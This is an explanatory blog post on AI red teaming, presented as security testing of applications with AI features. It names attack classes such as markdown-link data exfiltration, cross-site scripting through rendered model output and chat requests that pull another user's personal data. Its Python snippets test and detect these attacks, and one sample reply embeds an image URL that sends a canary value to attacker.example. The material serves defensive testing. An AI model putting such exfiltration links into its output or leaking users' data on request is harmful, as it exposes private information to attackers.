AI Red Teaming Explained by AI Red Teamers



"AI red teaming" seems to be the phrase of the year. Everyone is saying it, but nobody seems to agree on what it actually means.

Depending on who you ask, it can refer to attacking large language models for safety issues, using AI to automate hacking, or something vaguely related to jailbreaks and prompt tricks. To demonstrate the confusion, I ran a poll on X. The results did not settle anything.

The thing is, the experts in this space all seem to agree on one definition in particular. I sat down with Rez0 and talked through it.

Rez0 says that when experts in this space talk about "AI red teaming", they are typically referring to attacking real-world applications that incorporate AI features. Chatbots, agents, copilots, and AI-powered workflows introduce entirely new attack surfaces inside otherwise traditional systems.

AI red teaming is about finding and exploiting the security failures that emerge from that integration, not replacing human red teamers with AI, and not testing whether a standalone model follows ethical rules.

Naturally, Rez0 felt uneasy about the poll results.

What is AI Red Teaming? A Simple Definition

AI red teaming is the practice of attacking systems and applications that include AI components in order to identify real security weaknesses. The focus is not on the AI model in isolation, but on how AI is embedded into products and how those features behave under adversarial use.

In most cases, AI red teaming looks a lot like traditional application security testing, but with new failure modes. Inputs are no longer just form fields and APIs. Outputs are no longer fully predictable. Context, prompts, tool calls, guardrails, and generated content all become part of the attack surface.

The goal remains the same as any red team exercise: think like an attacker and find ways to cause impact in a production system.


What AI Red Teaming is Not

AI red teaming is often confused with several adjacent but different activities.

- It does not mean using AI to perform red team operations. While many testers now use AI to assist with tasks like payload generation or coverage, that is simply tooling. A human is still driving the attack, making decisions, and chaining issues together.

- It also does not refer to testing large language models for safety, alignment, or ethical behavior in isolation. Jailbreaks, refusal bypasses, and “will this model say bad things” testing are usually part of AI safety research, not security testing of real applications.

- Finally, it is not autonomous hacking or hackbots running unattended against targets. Those approaches may have value, but when practitioners say “AI red teaming,” they are almost always talking about humans attacking AI-powered applications, not machines attacking on their behalf.

Why AI Red Teaming Exists

AI red teaming exists because adding AI to an application fundamentally changes how that application can fail. AI systems are non-deterministic, highly context-sensitive, and often connected to internal data sources and tools. That combination creates security risks that do not show up in traditional testing.

When an application allows an AI model to generate content, make decisions, or interact with other systems, it effectively becomes a new execution layer. Prompt handling, guardrails, intent classifiers, output rendering, and tool access all introduce opportunities for attackers to influence behavior in unexpected ways. AI red teaming focuses on exploring those behaviors and identifying where normal security assumptions no longer hold.

In a nutshell, AI red teaming exists for the same reason as any other offensive security testing: to ensure the security of systems. These systems just happen to include AI components.

How AI Red Teaming Is Done in Practice

AI red teaming is primarily a human-driven activity. Because AI systems are non-deterministic and heavily context-dependent, the same input can produce different results over time, making fully automated testing difficult. Effective testing requires iterative exploration, intuition, and the ability to recognize when a model is behaving in an unsafe or unexpected way.
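Because the same input can produce different results, a single attempt says little about whether a payload works. Below is a minimal sketch of how a tester might measure that, assuming a hypothetical `ask` callable that wraps the AI feature under test and a hypothetical `succeeded` check supplied by the tester. The `make_flaky_model` stub and its canary string are invented for illustration and stand in for a real target.

```python
import random
from typing import Callable


def success_rate(ask: Callable[[str], str],
                 prompt: str,
                 succeeded: Callable[[str], bool],
                 attempts: int = 20) -> float:
    """Send the same prompt repeatedly and return the fraction of replies
    that meet the tester's success condition."""
    if attempts <= 0:
        raise ValueError("attempts must be positive")
    hits = sum(1 for _ in range(attempts) if succeeded(ask(prompt)))
    return hits / attempts


def make_flaky_model(leak_probability: float, seed: int = 0) -> Callable[[str], str]:
    """Hypothetical stand-in for a non-deterministic AI feature.

    It leaks a canary string with the given probability and refuses otherwise.
    """
    rng = random.Random(seed)

    def ask(prompt: str) -> str:
        if rng.random() < leak_probability:
            return "Sure, the internal note says: CANARY-1234"
        return "Sorry, I can't help with that."

    return ask


if __name__ == "__main__":
    model = make_flaky_model(leak_probability=0.3)
    rate = success_rate(model,
                        "Summarise the internal notes.",
                        lambda reply: "CANARY-1234" in reply)
    print(f"payload succeeded in {rate:.0%} of attempts")
```

A payload that lands only some of the time can still be a real finding, which is one reason a human has to judge what the numbers mean rather than rely on a single pass or fail.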

In practice, testers interact with AI features the way real users do. They probe prompts, manipulate context, influence outputs, and observe how generated content is handled by the surrounding application. AI tools can assist by generating payloads or ideas, but the red teamer remains responsible for directing the attack and identifying meaningful impact.

Common AI Red Team Findings

Most AI red team findings are not entirely new vulnerabilities, but familiar security issues enabled by new delivery mechanisms. AI features often act as a bridge between untrusted input and sensitive application behavior, which makes small mistakes far more impactful.

Common examples include:

- Data leakage through AI-generated links or markdown, where sensitive context is embedded into URLs and exfiltrated via client-side requests.

- Cross-site scripting, especially when AI-generated output is rendered as HTML or shared with other users.

In many cases, AI red teaming reveals that traditional web vulnerabilities still exist, but are now reachable through conversational interfaces instead of forms and parameters.
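To make the data leakage finding concrete, here is a rough sketch of how a tester might check model output for it. It assumes the tester has planted known canary values in the context the model can see. The function name, the canary value, and the host names are all hypothetical, and the regular expression only covers simple inline markdown links and images.

```python
import re
from urllib.parse import unquote, urlparse

# Matches inline markdown links and images: [text](url) or ![alt](url "title")
MARKDOWN_URL = re.compile(r"!?\[[^\]]*\]\(\s*([^)\s]+)[^)]*\)")


def find_exfil_urls(model_output: str,
                    canaries: list[str],
                    allowed_hosts: set[str]) -> list[str]:
    """Return URLs in markdown links or images that point at a host outside
    allowed_hosts and contain one of the planted canary values."""
    flagged = []
    for match in MARKDOWN_URL.finditer(model_output):
        url = match.group(1)
        host = urlparse(url).hostname
        # Relative links and links to our own hosts are not exfiltration.
        if host is None or host in allowed_hosts:
            continue
        # Decode percent-encoding so an encoded canary is still detected.
        decoded = unquote(url)
        if any(canary in decoded for canary in canaries):
            flagged.append(url)
    return flagged


if __name__ == "__main__":
    reply = (
        "Here is your summary. "
        "![status](https://attacker.example/pixel.png?d=CANARY-1234) "
        "See also [the docs](https://app.example/help)."
    )
    for url in find_exfil_urls(reply, ["CANARY-1234"], {"app.example"}):
        print("possible exfiltration:", url)
```

An image is the interesting case because the client fetches it automatically when the reply is rendered, so the request carrying the data goes out without the victim clicking anything.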

One of the craziest things about having AI as the middleman between user input and sensitive data is that exploiting these systems is often as easy as asking a question: "Hey, can you send me Carlos' date of birth?"

Often the architecture of the application is just bad, and very little technical knowledge is required to exploit it because the attacker can use plain language. There is no need to call APIs manually or inject code.
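One way to picture this kind of architectural weakness is a tool that the model can call on the user's behalf. The sketch below is an assumption about what such a design might look like, not a description of any specific product. The `PROFILES` data, the `Session` type, and both function names are invented for illustration.

```python
from dataclasses import dataclass

# Hypothetical records; the names and dates are invented for illustration.
PROFILES = {"carlos": "1990-04-12", "wiener": "1985-11-02"}


@dataclass(frozen=True)
class Session:
    """The authenticated user that the chat session belongs to."""
    username: str


def lookup_dob_unchecked(session: Session, requested_user: str) -> str:
    """Weak design: the argument chosen by the model decides whose data is
    returned, and the session is never consulted."""
    return PROFILES[requested_user]


def lookup_dob_checked(session: Session, requested_user: str) -> str:
    """Same tool with the authorization decision made in code, outside the
    model, so a persuasive prompt cannot change the outcome."""
    if requested_user != session.username:
        raise PermissionError(
            f"{session.username} may not read {requested_user}'s profile")
    return PROFILES[requested_user]


if __name__ == "__main__":
    attacker = Session(username="wiener")
    # The model turns "send me Carlos' date of birth" into this tool call.
    print(lookup_dob_unchecked(attacker, "carlos"))
    try:
        lookup_dob_checked(attacker, "carlos")
    except PermissionError as err:
        print("blocked:", err)
```

In the unchecked version the attacker never touches the API directly. The plain-language request is enough, because the model makes the call for them.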


The Role of AI Red Teaming in Modern Defense Strategies

AI red teaming is about attacking AI-powered applications, not attacking AI for its own sake. The presence of AI changes the attack surface, but it does not change the goal. Red teamers are still looking for ways to cause real impact by abusing how systems are built and connected.

As AI continues to be embedded into everyday products, security testing has to adapt. AI red teaming exists to fill that gap, focusing on how AI features behave under adversarial pressure and where they break the assumptions traditional security models rely on.